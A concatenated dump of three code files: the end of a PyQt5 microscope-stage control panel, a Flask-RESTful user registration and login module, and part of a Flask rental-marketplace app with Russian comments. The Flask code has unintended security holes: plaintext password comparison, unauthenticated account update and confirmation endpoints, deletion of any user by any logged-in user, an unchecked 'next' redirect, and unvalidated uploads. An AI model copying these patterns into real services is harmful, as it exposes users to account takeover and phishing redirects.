self.upLButton.setIconSize(QtCore.QSize(56, 56))\r\n self.verticalLayout_5.addWidget(self.upLButton)\r\n self.upSButton = QtWidgets.QPushButton(self)\r\n self.upSButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\1uparrow-128.png\"))\r\n self.upSButton.setIconSize(QtCore.QSize(56, 56))\r\n self.verticalLayout_5.addWidget(self.upSButton)\r\n self.gridLayout.addLayout(self.verticalLayout_5, 0, 1, 1, 1)\r\n\r\n # gridlayout--(posgroupbox)verticallayout_2--horizontallayout_3+horizontallayout_4+horizontallayout_5\r\n self.posGroupBox = QtWidgets.QGroupBox(\"position\",self)\r\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.posGroupBox)\r\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self)\r\n self.xposLabel = QtWidgets.QLabel('x posi: 1,26 ', self.posGroupBox)\r\n self.horizontalLayout_3.addWidget(self.xposLabel)\r\n self.verticalLayout_2.addLayout(self.horizontalLayout_3)\r\n\r\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout()\r\n self.yposLabel = QtWidgets.QLabel('y posi: ', self.posGroupBox)\r\n self.horizontalLayout_4.addWidget(self.yposLabel)\r\n self.verticalLayout_2.addLayout(self.horizontalLayout_4)\r\n\r\n self.horizontalLayout_14 = QtWidgets.QHBoxLayout()\r\n self.zposLabel = QtWidgets.QLabel('z posi: ', self.posGroupBox)\r\n self.horizontalLayout_14.addWidget(self.zposLabel)\r\n #self.zposText = QtWidgets.QLabel(self.posGroupBox)\r\n self.verticalLayout_2.addLayout(self.horizontalLayout_14)\r\n self.verticalLayout_2.addItem(spacerItem)\r\n\r\n self.horizontalLayout_range1 = QtWidgets.QHBoxLayout()\r\n self.xrangeLabel = QtWidgets.QLabel('x range: ', self.posGroupBox)\r\n self.horizontalLayout_range1.addWidget(self.xrangeLabel)\r\n 
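# (note) the position/range labels above are static placeholders; the stage\r\n # controller is expected to refresh them at runtime, e.g. (assumed wiring):\r\n # self.xposLabel.setText('x posi: {:.3f}'.format(x))\r\n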
self.verticalLayout_2.addLayout(self.horizontalLayout_range1)\r\n\r\n self.horizontalLayout_range2 = QtWidgets.QHBoxLayout()\r\n self.yrangeLabel = QtWidgets.QLabel('y range: ', self.posGroupBox)\r\n self.horizontalLayout_range2.addWidget(self.yrangeLabel)\r\n self.verticalLayout_2.addLayout(self.horizontalLayout_range2)\r\n\r\n self.horizontalLayout_range3 = QtWidgets.QHBoxLayout()\r\n self.zrangeLabel = QtWidgets.QLabel('z range: ', self.posGroupBox)\r\n self.horizontalLayout_range3.addWidget(self.zrangeLabel)\r\n self.verticalLayout_2.addLayout(self.horizontalLayout_range3)\r\n self.verticalLayout_2.addItem(spacerItem)\r\n self.posGroupBox.setLayout(self.verticalLayout_2)\r\n self.gridLayout.addWidget(self.posGroupBox, 0, 2, 1, 1)\r\n\r\n# gridlayout--horizontallayout_6--leftbuttons\r\n # homebutton\r\n # horizontallayout_7--rightbuttons\r\n self.horizontalLayout_6 = QtWidgets.QHBoxLayout()\r\n spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_6.addItem(spacerItem3)\r\n self.xlabel=QtWidgets.QLabel('X axis',self)\r\n self.horizontalLayout_6.addWidget(self.xlabel)\r\n self.leftLButton = QtWidgets.QPushButton(self)\r\n self.leftLButton.setMinimumSize(QtCore.QSize(68, 66))\r\n self.leftLButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\2leftarrow-128.png\"))\r\n self.leftLButton.setIconSize(QtCore.QSize(56, 56))\r\n self.horizontalLayout_6.addWidget(self.leftLButton)\r\n\r\n self.leftSButton = QtWidgets.QPushButton(self)\r\n self.leftSButton.setMinimumSize(QtCore.QSize(52, 66))\r\n self.leftSButton.setMaximumSize(QtCore.QSize(52, 66))\r\n self.leftSButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\1leftarrow-128.png\"))\r\n self.leftSButton.setIconSize(QtCore.QSize(56, 56))\r\n self.horizontalLayout_6.addWidget(self.leftSButton)\r\n self.gridLayout.addLayout(self.horizontalLayout_6, 1, 0, 1, 1)\r\n\r\n self.horizontalLayout_11 = QtWidgets.QHBoxLayout()\r\n self.rightSButton = QtWidgets.QPushButton(self)\r\n self.rightSButton.setMinimumSize(QtCore.QSize(52, 66))\r\n self.rightSButton.setMaximumSize(QtCore.QSize(52, 66))\r\n self.rightSButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\1rightarrow-128.png\"))\r\n self.rightSButton.setIconSize(QtCore.QSize(56, 56))\r\n self.horizontalLayout_11.addWidget(self.rightSButton)\r\n\r\n self.rightLButton = QtWidgets.QPushButton(self)\r\n self.rightLButton.setMinimumSize(QtCore.QSize(68, 66))\r\n self.rightLButton.setMaximumSize(QtCore.QSize(68, 66))\r\n self.rightLButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\2rightarrow-128.png\"))\r\n self.rightLButton.setIconSize(QtCore.QSize(56, 56))\r\n self.horizontalLayout_11.addWidget(self.rightLButton)\r\n spacerItem4 = QtWidgets.QSpacerItem(10, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_11.addItem(spacerItem4)\r\n\r\n self.exitButton = QtWidgets.QPushButton(\"Exit\",self)\r\n self.exitButton.setMinimumSize(QtCore.QSize(40, 40))\r\n self.exitButton.setMaximumSize(QtCore.QSize(40, 40))\r\n self.horizontalLayout_11.addWidget(self.exitButton)\r\n self.gridLayout.addLayout(self.horizontalLayout_11, 1, 2, 1, 1)\r\n\r\n# 
gridlayout--(movegroupbox)verticallayout_3--horizontallayout_7+horizontallayout_8+horizontallayout_9\r\n self.moveGroupBox = QtWidgets.QGroupBox(\"customize move\",self)\r\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.moveGroupBox)\r\n self.verticalLayout_3.addItem(spacerItem)\r\n\r\n self.horizontalLayout_m7 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_m7.addItem(spacerItem)\r\n self.xmoveLabel = QtWidgets.QLabel('x', self.moveGroupBox)\r\n self.horizontalLayout_m7.addWidget(self.xmoveLabel)\r\n self.verticalLayout_3.addItem(spacerItem)\r\n self.xmoveDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.moveGroupBox)\r\n self.xmoveDoubleSpinBox.setDecimals(3)\r\n self.xmoveDoubleSpinBox.setMinimum(-10.0)\r\n self.xmoveDoubleSpinBox.setMaximum(10.0)\r\n self.horizontalLayout_m7.addWidget(self.xmoveDoubleSpinBox)\r\n self.verticalLayout_3.addItem(spacerItem1)\r\n self.verticalLayout_3.addLayout(self.horizontalLayout_m7) # horizontallayout_7: xmovelabel+xdoublespinbox\r\n\r\n self.horizontalLayout_m8 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_m8.addItem(spacerItem)\r\n self.ymoveLabel = QtWidgets.QLabel('y', self.moveGroupBox)\r\n self.horizontalLayout_m8.addWidget(self.ymoveLabel)\r\n self.verticalLayout_3.addItem(spacerItem)\r\n self.ymoveDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.moveGroupBox)\r\n self.ymoveDoubleSpinBox.setDecimals(3)\r\n self.ymoveDoubleSpinBox.setMinimum(-10.0)\r\n self.ymoveDoubleSpinBox.setMaximum(10.0)\r\n self.horizontalLayout_m8.addWidget(self.ymoveDoubleSpinBox)\r\n self.verticalLayout_3.addItem(spacerItem)\r\n self.verticalLayout_3.addLayout(self.horizontalLayout_m8)\r\n\r\n self.horizontalLayout_m9 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_m9.addItem(spacerItem)\r\n self.zmoveLabel = QtWidgets.QLabel('z', self.moveGroupBox)\r\n self.zmoveLabel.setObjectName(\"zmoveLabel\")\r\n self.horizontalLayout_m9.addWidget(self.zmoveLabel)\r\n self.zmoveDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.moveGroupBox)\r\n self.zmoveDoubleSpinBox.setDecimals(3)\r\n self.zmoveDoubleSpinBox.setMinimum(-15.0)\r\n self.zmoveDoubleSpinBox.setMaximum(2.4)\r\n self.horizontalLayout_m9.addWidget(self.zmoveDoubleSpinBox)\r\n self.verticalLayout_3.addLayout(self.horizontalLayout_m9) # horizontallayout_7: xmovelabel+xdoublespinbox\r\n\r\n self.verticalLayout_3.addItem(spacerItem4)\r\n\r\n self.horizontalLayout_m10 = QtWidgets.QHBoxLayout()\r\n self.movelabel = QtWidgets.QLabel(self.moveGroupBox)\r\n self.movelabel.setText('Rel_Abs')\r\n self.horizontalLayout_m10.addWidget(self.movelabel)\r\n self.moveComboBox = QtWidgets.QComboBox(self.moveGroupBox)\r\n self.moveComboBox.setObjectName(\"moveComboBox\")\r\n self.moveComboBox.addItems(['Rel', 'Abs'])\r\n self.horizontalLayout_m10.addWidget(self.moveComboBox)\r\n self.verticalLayout_3.addLayout(self.horizontalLayout_m10)\r\n self.verticalLayout_3.addItem(spacerItem4)\r\n\r\n self.horizontalLayout_m11 = QtWidgets.QHBoxLayout()\r\n self.vtype = QtWidgets.QLabel(\"velocity\",self.moveGroupBox)\r\n self.horizontalLayout_m11.addWidget(self.vtype)\r\n self.VDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.moveGroupBox)\r\n self.VDoubleSpinBox.setDecimals(3)\r\n self.VDoubleSpinBox.setMinimum(0.000)\r\n self.VDoubleSpinBox.setMaximum(2.590)\r\n self.horizontalLayout_m11.addWidget(self.VDoubleSpinBox)\r\n self.VON_OFF = QtWidgets.QPushButton(\"OFF\",self.moveGroupBox)\r\n self.VON_OFF.setCheckable(True)\r\n self.horizontalLayout_m11.addWidget(self.VON_OFF)\r\n self.verticalLayout_3.addLayout(self.horizontalLayout_m11)\r\n\r\n 
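# (sketch, assumption) VON_OFF is checkable but its label never changes; a\r\n # toggled handler would keep the text in sync:\r\n # self.VON_OFF.toggled.connect(lambda on: self.VON_OFF.setText('ON' if on else 'OFF'))\r\n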
self.horizontalLayout_m12 = QtWidgets.QHBoxLayout()\r\n self.Vlimit=QtWidgets.QLabel(self.moveGroupBox)\r\n self.horizontalLayout_m12.addWidget(self.Vlimit)\r\n self.verticalLayout_3.addItem(spacerItem1)\r\n\r\n self.horizontalLayout_m12.addItem(spacerItem)\r\n self.goButton = QtWidgets.QPushButton('Go', self.moveGroupBox)\r\n self.horizontalLayout_m12.addWidget(self.goButton)\r\n self.verticalLayout_3.addLayout(self.horizontalLayout_m12)\r\n self.gridLayout.addWidget(self.moveGroupBox, 2, 0, 1, 1)\r\n\r\n# gridlayout--verticallayout_8--downbutton\r\n self.verticalLayout_8 = QtWidgets.QVBoxLayout()\r\n self.downSButton = QtWidgets.QPushButton(self)\r\n self.downSButton.setMinimumSize(QtCore.QSize(66, 52))\r\n self.downSButton.setMaximumSize(QtCore.QSize(66, 52))\r\n self.downSButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\1downarrow1-128.png\"))\r\n self.downSButton.setIconSize(QtCore.QSize(56, 56))\r\n self.downSButton.setObjectName(\"backwardSButton\")\r\n self.verticalLayout_8.addWidget(self.downSButton)\r\n\r\n self.downLButton = QtWidgets.QPushButton(self)\r\n self.downLButton.setMinimumSize(QtCore.QSize(66, 68))\r\n self.downLButton.setMaximumSize(QtCore.QSize(66, 68))\r\n self.downLButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\2dowarrow-128.png\"))\r\n self.downLButton.setIconSize(QtCore.QSize(56, 56))\r\n self.downLButton.setObjectName(\"backwardLButton\")\r\n self.verticalLayout_8.addWidget(self.downLButton)\r\n self.gridLayout.addLayout(self.verticalLayout_8, 2, 1, 1, 1)\r\n\r\n # piezo ui\r\n self.piezoGroupBox = QtWidgets.QGroupBox(\"piezo stage\",self)\r\n self.verticalLayout_piezo = QtWidgets.QVBoxLayout(self.piezoGroupBox)\r\n self.verticalLayout_piezo.addItem(spacerItem)\r\n self.horizontalLayout_p1 = QtWidgets.QHBoxLayout()\r\n self.label = QtWidgets.QLabel('z_abs', self.piezoGroupBox)\r\n self.horizontalLayout_p1.addWidget(self.label)\r\n\r\n self.piezo_doublespinbox = QtWidgets.QDoubleSpinBox(self.piezoGroupBox)\r\n self.piezo_doublespinbox.setDecimals(1)\r\n self.piezo_doublespinbox.setMinimum(-200.0)\r\n self.piezo_doublespinbox.setMaximum(200.0)\r\n self.horizontalLayout_p1.addWidget(self.piezo_doublespinbox)\r\n\r\n self.piezo_go = QtWidgets.QPushButton('GO', self.piezoGroupBox)\r\n self.horizontalLayout_p1.addWidget(self.piezo_go)\r\n self.verticalLayout_piezo.addLayout(self.horizontalLayout_p1)\r\n self.verticalLayout_piezo.addItem(spacerItem)\r\n\r\n self.horizontalLayout_p3=QtWidgets.QHBoxLayout(self.piezoGroupBox)\r\n self.zrel_label=QtWidgets.QLabel(\"z_Rel\",self.piezoGroupBox)\r\n self.horizontalLayout_p3.addWidget(self.zrel_label)\r\n\r\n self.zReldoublespinbox=QtWidgets.QDoubleSpinBox()\r\n self.zReldoublespinbox.setMaximum(200)\r\n self.zReldoublespinbox.setValue(0)\r\n self.horizontalLayout_p3.addWidget(self.zReldoublespinbox)\r\n\r\n self.zRel_button=QtWidgets.QPushButton(\"Go\",self.piezoGroupBox)\r\n self.horizontalLayout_p3.addWidget(self.zRel_button)\r\n self.verticalLayout_piezo.addLayout(self.horizontalLayout_p3)\r\n self.verticalLayout_piezo.addItem(spacerItem)\r\n\r\n self.horizontalLayout_p2 = QtWidgets.QHBoxLayout(self.piezoGroupBox)\r\n self.piezo_postext = QtWidgets.QLabel(\"position: \",self.piezoGroupBox)\r\n self.horizontalLayout_p2.addWidget(self.piezo_postext)\r\n self.verticalLayout_piezo.addLayout(self.horizontalLayout_p2)\r\n 
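# Note: the same QSpacerItem instance is re-added to several layouts in this\r\n # file; Qt takes ownership on addItem(), so only the last layout actually\r\n # keeps it. A fresh spacer per layout (sketch) avoids that:\r\n # layout.addItem(QtWidgets.QSpacerItem(1, 1, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding))\r\n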
self.verticalLayout_piezo.addItem(spacerItem)\r\n\r\n self.horizontalLayout_p4 = QtWidgets.QHBoxLayout(self.piezoGroupBox)\r\n self.rangelabel=QtWidgets.QLabel(\"range: \",self.piezoGroupBox)\r\n self.horizontalLayout_p4.addWidget(self.rangelabel)\r\n self.verticalLayout_piezo.addLayout(self.horizontalLayout_p4)\r\n self.verticalLayout_piezo.addItem(spacerItem)\r\n\r\n horizontalLayout_r=QtWidgets.QHBoxLayout(self.piezoGroupBox)\r\n label=QtWidgets.QLabel(\"recording\",self.piezoGroupBox)\r\n self.record_move_range=QtWidgets.QDoubleSpinBox(self.piezoGroupBox)\r\n self.move_stage_in_record=QtWidgets.QPushButton(\"Set\",self.piezoGroupBox)\r\n self.move_stage_in_record.setCheckable(True)\r\n horizontalLayout_r.addWidget(label)\r\n horizontalLayout_r.addWidget(self.record_move_range)\r\n horizontalLayout_r.addWidget(self.move_stage_in_record)\r\n self.verticalLayout_piezo.addLayout(horizontalLayout_r)\r\n self.verticalLayout_piezo.addItem(spacerItem)\r\n\r\n self.gridLayout.addWidget(self.piezoGroupBox, 2, 2, 1,1)\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QtWidgets.QApplication(sys.argv)\r\n example = stageUI()\r\n sys.exit(app.exec_())\r\n","repo_name":"teldawyj/TSTORM_communication_enabled","sub_path":"stage_UI.py","file_name":"stage_UI.py","file_ext":"py","file_size_in_byte":17884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14952382022","text":"from flask_restful import Resource, reqparse\nfrom models.user import UserModel\nfrom flask_jwt_extended import create_access_token, jwt_required, get_jwt\nfrom werkzeug.security import safe_str_cmp\nfrom blacklist import BLACKLIST\nimport traceback\nfrom flask import make_response, render_template\n\nbody_request = reqparse.RequestParser()\nbody_request.add_argument('email', type=str, required=True, help=\"The field 'email' cannot be left blank.\")\nbody_request.add_argument('password', type=str, required=True, help=\"The field 'password' cannot be left blank.\")\nbody_request.add_argument('username', type=str)\nbody_request.add_argument('activated', type=bool) \nbody_request.add_argument('restaurant_id', type=str)\n\n\nclass User(Resource):\n # /users/{user_id}\n def get(self, user_id):\n user = UserModel.find_user(user_id)\n if user:\n return user.json()\n return {'message': 'User not found.'}, 404\n\n def put(self,email):\n data = body_request.parse_args()\n user = UserModel.find_by_email(email)\n if user:\n user.restaurant_id = data.get('restaurant_id')\n user.save_user()\n return user.json(), 200\n return {'message': 'User not found.'}, 404\n\n @jwt_required()\n def delete(self, user_id):\n user = UserModel.find_user(user_id)\n if user:\n user.delete_user()\n return {'message': 'User deleted.'}\n return {'message': 'User not found.'}, 404\n\nclass UserRegister(Resource):\n # /register\n def post(self):\n data = body_request.parse_args()\n if not data.get('email') or data.get('email') is None:\n return {\"message\": \"The field 'email' cannot be left blank.\"}, 400\n\n if UserModel.find_by_email(data['email']):\n return {\"message\": \"The email '{}' already exists.\".format(data['email'])}, 400\n\n if UserModel.find_by_username(data['username']):\n return {\"message\": \"The username '{}' already exists.\".format(data['username'])}, 400 #Bad Request\n\n user = UserModel(**data)\n user.activated = True ###################### Change Here - False after\n try:\n user.save_user()\n user.send_confirmation_email()\n except:\n user.delete_user()\n traceback.print_exc()\n return 
{'message': 'An internal server error has ocurred.'}, 500\n return {'message': 'User created successfully!'}, 201 # Created\n\nclass UserLogin(Resource):\n\n @classmethod\n def post(cls):\n data = body_request.parse_args()\n\n user = UserModel.find_by_email(data['email'])\n\n if user and safe_str_cmp(user.password, data['password']):\n if user.activated:\n access_token = create_access_token(identity=user.user_id)\n return {'username': user.username, \n \"restaurant_id\": user.restaurant_id, \n \"email\": user.email,\n 'access_token': access_token}, 200\n return {'message': 'User not confirmed.'}, 400\n return {'message': 'The email or password is incorrect.'}, 401 # Unauthorized\n\n\nclass UserLogout(Resource):\n\n @jwt_required()\n def post(self):\n jwt_id = get_jwt()['jti'] # JWT Token Identifier\n BLACKLIST.add(jwt_id)\n return {'message': 'Logged out successfully!'}, 200\n\nclass UserConfirm(Resource):\n # /confirm/{user_id}\n @classmethod\n def get(cls, user_id):\n user = UserModel.find_user(user_id)\n\n if not user:\n return {\"message\": \"User id '{}' not found.\".format(user_id)}, 404\n\n user.activated = True\n user.save_user()\n # return {\"message\": \"User id '{}' confirmed successfully.\".format(user_id)}, 200\n headers = {'Content-Type': 'text/html'}\n return make_response(render_template('user_confirm.html', email=user.email, user=user.username), 200, headers)\n","repo_name":"odanilomoreira/sms-creator","sub_path":"resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72161870826","text":"# Импортирование необходимых модулей\nimport os\nfrom uuid import uuid4\nfrom dotenv import load_dotenv, find_dotenv\nfrom flask import Flask, render_template, request, redirect, flash, json\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import or_\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom flask_login import LoginManager, UserMixin, login_required, login_user, logout_user, current_user\nfrom flask_socketio import SocketIO\nfrom datetime import date\n\nload_dotenv(find_dotenv())\n\n# Создание экземпляра app\napp = Flask(__name__)\napp.secret_key = os.getenv('SECRET_KEY')\n\n# Создание экземпляра socketio\nsocketio = SocketIO(app)\n\n# Настройки приложения и подключения к базе данных\napp.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DB_URI')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\nUPLOAD_FOLDER = os.getenv('UPLOAD_FOLDER')\n\n# Создание экземпляра login_manager\nlogin_manager = LoginManager(app)\n\n\n# Создание моделей базы данных\n# Пользователь\nclass User(db.Model, UserMixin):\n __tablename__ = 'user'\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(20), nullable=True)\n dob = db.Column(db.Date, nullable=True)\n role = db.Column(db.String(13), nullable=True)\n phone = db.Column(db.String(12), nullable=True)\n email = db.Column(db.String(50), nullable=True, unique=True)\n hash_password = db.Column(db.String(500), nullable=True)\n\n\n# Определение функции user_loader экземпляра login_manager\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(user_id)\n\n\n# Предмет\nclass Item(db.Model):\n __tablename__ = 'item'\n id_item = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), nullable=True)\n category = db.Column(db.String(100), nullable=True)\n description = db.Column(db.Text, 
nullable=True)\n rent_price = db.Column(db.Numeric, nullable=True)\n image_url = db.Column(db.String(100), nullable=True)\n\n\n# Объявление аренды\nclass RentOut(db.Model):\n __tablename__ = 'rent_out'\n id_rent_out = db.Column(db.Integer, primary_key=True)\n status = db.Column(db.String(9), nullable=True)\n id_user = db.Column(db.Integer, db.ForeignKey(\"user.id\"))\n id_item = db.Column(db.Integer, db.ForeignKey(\"item.id_item\"))\n\n\n# Заявка на аренду\nclass RentIn(db.Model):\n __tablename__ = 'rent_in'\n id_rent_in = db.Column(db.Integer, primary_key=True)\n status = db.Column(db.String(20), nullable=True)\n date_rent_start = db.Column(db.DateTime, nullable=True)\n date_rent_finish = db.Column(db.DateTime, nullable=True)\n note = db.Column(db.Text)\n id_user = db.Column(db.Integer, db.ForeignKey(\"user.id\"))\n id_rent_out = db.Column(db.Integer, db.ForeignKey(\"rent_out.id_rent_out\"))\n\n\n# Корзина\nclass Bag(db.Model):\n __tablename__ = 'bag'\n id_bag = db.Column(db.Integer, primary_key=True)\n id_user = db.Column(db.Integer, db.ForeignKey(\"user.id\"))\n id_rent_out = db.Column(db.Integer, db.ForeignKey(\"rent_out.id_rent_out\"))\n\n\n# Жалоба\nclass Complaint(db.Model):\n __tablename__ = 'complaint'\n id_complaint = db.Column(db.Integer, primary_key=True)\n id_rent_in = db.Column(db.Integer, db.ForeignKey(\"rent_in.id_rent_in\"))\n id_user = db.Column(db.Integer, db.ForeignKey(\"user.id\"))\n description = db.Column(db.Text, nullable=True)\n status = db.Column(db.String(20), nullable=True)\n\n\n# Обработчики адресов\n# Главная страница\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n\n# Страница регистрации\n@app.route(\"/registration\", methods=(\"POST\", \"GET\"))\ndef registration():\n if request.method == \"POST\":\n # Получение данных из формы\n username = request.form[\"username\"]\n dob = request.form[\"dob\"]\n phone = request.form[\"phone\"]\n email = request.form[\"email\"]\n password = request.form[\"password\"]\n confirm = request.form[\"confirm\"]\n # Валидация полученных данных\n if len(username) > 20 or len(username) < 1 or username.isalpha() is False:\n flash(\"Имя должно состоять из алфавитных символов и быть длинной от 1 до 20 символов.\")\n elif len(dob) != 10 or (\n (date.today().year - int(dob[:4])) * 12 * 30 + date.today().month * 30 + date.today().day - (\n int(dob[5:7]) * 30 + int(dob[8:10]))) / 360 < 18:\n flash(\n \"Регистрация доступна только с 18 лет. Если Вы достигли указанного возраста проверьте формат даты.\")\n elif len(phone) != 12 or (phone[0] + phone[1] != \"+7\") or phone[1:].isdigit() is False:\n flash(\"Неверный формат номера.\")\n elif email.count(\"@\") != 1 or email.count(\".\") < 1 or len(email) < 6 or len(email) > 50:\n flash(\"Неверный формат электронной почты.\")\n elif len(password) > 20 or len(password) < 3:\n flash(\"Длина пароля должна составлять от 3 до 20 символов.\")\n elif password != confirm:\n flash(\"Пароли не совпадают.\")\n else:\n try:\n # Создание экземпляра класса User и добавление его в бд\n hash = generate_password_hash(password)\n user = User(\n username=username,\n dob=dob,\n role=\"клиент\",\n phone=phone,\n email=email,\n hash_password=hash)\n db.session.add(user)\n db.session.commit()\n flash(\"Учётная запись успешно создана.\", category=\"success\")\n return redirect(\"/profile\")\n except:\n db.session.rollback()\n flash(\n \"Проверьте корректность введённых данных. 
Возможно, пользователь с таким Email уже зарегистрирован.\")\n\n return render_template(\"registration.html\")\n\n\n# Определение профиля\n@app.route(\"/profile\")\n@login_required\ndef profile():\n # Проверка роли пользователя\n user_login = User.query.get(current_user.id)\n if user_login.role == \"клиент\":\n return redirect(\"/profile_client\")\n else:\n return redirect(\"/profile_admin\")\n\n\n# Страница профиля клиента\n@app.route(\"/profile_client\")\n@login_required\ndef profile_client():\n # Проверка роли пользователя\n user = User.query.get(current_user.id)\n if user.role != \"клиент\":\n return redirect(\"/profile\")\n return render_template(\"profile_client.html\", user=user)\n\n\n# Страница профиля администратора\n@app.route(\"/profile_admin\")\n@login_required\ndef profile_admin():\n # Определение роли пользователя\n admin = User.query.get(current_user.id)\n if admin.role != \"администратор\":\n return redirect(\"/profile\")\n return render_template(\"profile_admin.html\", admin=admin)\n\n\n# Страница входа в систему\n@app.route(\"/login\", methods=(\"POST\", \"GET\"))\ndef login():\n if request.method == \"POST\":\n # Получение данных из формы\n email = request.form[\"email\"]\n password = request.form[\"password\"]\n # Валидация полученных данных\n if email.count(\"@\") != 1 or email.count(\".\") < 1 or len(email) < 6 or len(email) > 50:\n flash(\"Неверный формат электронной почты.\")\n elif len(password) > 20 or len(password) < 3:\n flash(\"Длина пароля должна составлять от 3 до 20 символов.\")\n else:\n # Получение из бд пользователя по полю email\n user = User.query.filter_by(email=email).first()\n # Если данные верны, то пользователь будет авторизован и перенаправлен на запрашиваемую страницу\n if user and check_password_hash(user.hash_password, password):\n login_user(user)\n next_page = request.args.get(\"next\")\n return redirect(next_page)\n else:\n flash(\"Неверный логин или пароль.\")\n\n return render_template(\"login.html\")\n\n\n# Обработчик выхода\n@app.route(\"/logout\")\n@login_required\ndef logout():\n logout_user()\n return redirect(\"/\")\n\n\n# Каталог\n@app.route(\"/catalog\")\ndef catalog():\n return render_template(\"catalog.html\")\n\n\n# Страница модерации объявлений\n@app.route(\"/moderation\")\n@login_required\ndef moderation():\n return render_template(\"moderation.html\")\n\n\n# Страница просмотра жалоб пользователей\n@app.route(\"/complaint\")\n@login_required\ndef complaint():\n return render_template(\"complaint.html\")\n\n\n# Страница объявлений пользователя\n@app.route(\"/my_rent_out\")\n@login_required\ndef my_rent_out():\n return render_template(\"my_rent_out.html\")\n\n\n# Страница избранных предметов\n@app.route(\"/bag\")\n@login_required\ndef bag():\n return render_template(\"bag.html\")\n\n\n# Страница создания нового объявления\n@app.route(\"/add_rent_out\", methods=(\"POST\", \"GET\"))\n@login_required\ndef add_rent_out():\n if request.method == 'POST':\n try:\n name = request.form['name']\n category = request.form['category']\n description = request.form['description']\n rent_price = request.form['rent_price']\n file = request.files['file']\n file.filename = str(uuid4()) + '.png'\n save_path = os.path.join(UPLOAD_FOLDER, file.filename)\n file.save(save_path)\n\n # Создание предмета с полученными данными и запись в бд\n item = Item(name=name, category=category, description=description, rent_price=rent_price,\n image_url=save_path)\n db.session.add(item)\n db.session.commit()\n\n # Получение id только что добавленного предмета\n 
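# Re-querying by descending id can race under concurrent inserts; a safer\n # sketch (assumption, same SQLAlchemy session API) is to flush and read the\n # primary key straight off the pending object:\n # db.session.flush()\n # rent_out = RentOut(status=\"активно\", id_item=item.id_item, id_user=current_user.id)\n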
new_item = db.session.query(Item).order_by(Item.id_item.desc()).first()\n # Создание объявления и добавление в бд\n rent_out = RentOut(status=\"активно\", id_item=new_item.id_item, id_user=current_user.id)\n db.session.add(rent_out)\n db.session.commit()\n flash(\"Объявление успешно добавлено.\", category=\"success\")\n except:\n db.session.rollback()\n flash(\"Возникла ошибка. Не удалось добавить объявление. Попробуйте ещё раз.\")\n\n return render_template(\"add_rent_out.html\")\n\n\n# Страница создания новой заявки\n@app.route(\"/add_rent_in/\")\n@login_required\ndef add_rent_in(id_rent_out):\n return render_template(\"add_rent_in.html\", id_rent_out=id_rent_out)\n\n\n# Страница создания новой жалобы\n@app.route(\"/add_complaint/\")\n@login_required\ndef add_complaint(id_rent_in):\n return render_template(\"add_complaint.html\", id_rent_in=id_rent_in)\n\n\n# Страница входящих заявок\n@app.route(\"/incoming\")\n@login_required\ndef incoming():\n return render_template(\"incoming.html\")\n\n\n# Страница исходящих заявок\n@app.route(\"/outgoing\")\n@login_required\ndef outgoing():\n return render_template(\"outgoing.html\")\n\n\n# Страница с действующими арендами пользователя\n@app.route(\"/irent\")\n@login_required\ndef irent():\n return render_template(\"irent.html\")\n\n\n# Страница с действующими сдачами в аренду пользователя\n@app.route(\"/notirent\")\n@login_required\ndef notirent():\n return render_template(\"notirent.html\")\n\n\n# История моих аренд\n@app.route(\"/irent_histori\")\n@login_required\ndef irent_histori():\n return render_template(\"irent_histori.html\")\n\n\n# История сдачи в аренду\n@app.route(\"/notirent_histori\")\n@login_required\ndef notirent_histori():\n return render_template(\"notirent_histori.html\")\n\n\n# Страница жалоб пользователя\n@app.route(\"/my_complaint\")\n@login_required\ndef my_complaint():\n return render_template(\"my_complaint.html\")\n\n\n# Перенаправление для гостя\n@app.after_request\ndef redirect_to_signin(response):\n if response.status_code == 401:\n return redirect(\"/login\" + \"?next=\" + request.url)\n return response\n\n\n# Обработчики событий socket.io\n# Обновление данных каталога\n@socketio.on('reload_catalog')\ndef 